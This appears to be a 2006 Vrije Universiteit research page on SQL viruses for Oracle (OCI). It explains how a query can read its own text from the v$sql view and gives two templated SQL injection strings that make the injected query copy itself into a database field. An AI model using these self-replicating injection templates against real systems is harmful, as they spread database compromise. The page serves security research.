logo
Go to the homepage of the Vrije Universiteit. Go to the homepage of the faculty of sciences.

SQL Virus Using Self-Referential Queries for Oracle (OCI)


The currently executing query can be obtained using the SQL_TEXT field of the v$sql view, which provides access to all currently executing queries. To access the v$sql view, the user must be an administrator.

The correct query can be extracted from this table using the following query:

SELECT sql.SQL_TEXT from v$sql sql, v$session ses, v$mystat sta WHERE sql.sql_id=ses.sql_id AND ses.sid=sta.sid AND sta.STATISTIC#=0
Query  1 - Self-referential query for Oracle
It is also possible to select the correct query by including a unique string in the query and filtering on this string, as in the query below.
select SQL_TEXT FROM v$sql WHERE INSTR(SQL_TEXT, 'unique string')>0
Query  2 - Self-referential query for Oracle
In this case, the unique string in the filter is also the string that is found in the v$sql view.
This query is shorter than the first example, but may fail if the string is not unique, as this would cause the query to return multiple results, which causes an error if a single result was expected.

On Oracle, the following code will perform the attack, when using the OCI API:

%content%',NewContents=(SELECT SUBSTR(SQL_TEXT,43,%len%)FROM v$sql WHERE INSTR(SQL_TEXT,'%payload%')>0)--
Exploit  1 - Oracle (OCI) exploit using single query
In this example, %len% is the length of the entire exploit, after the content and payload have been included. The payload is used both as an attack and to select the proper query from the v$sql view. This will cause the attack to fail if multiple instances run at the same time, as the SELECT query returns multiple values.

Exploit  2 shows a more reliable Oracle exploit, but this one is considerably larger.

%content%',NewContents=(SELECT SUBSTR (sql.SQL_TEXT, 43, %len%) from v$sql sql, v$session ses, v$mystat sta WHERE sql.sql_id=ses.sql_id AND ses.sid=sta.sid AND sta.STATISTIC#=0)--%payload%
Exploit  2 - Reliable Oracle (OCI) exploit using single query

Up SQL Virus Using Self-Referential Queries
SQL Virus Using Self-Referential Queries for Oracle (iSQL*Plus) Next

Last modified: Monday, 27 February 2006 14:33, CET
If you spot a mistake, please e-mail the maintainer of this page.
Your browser does not fully support CSS. This may result in visual artifacts.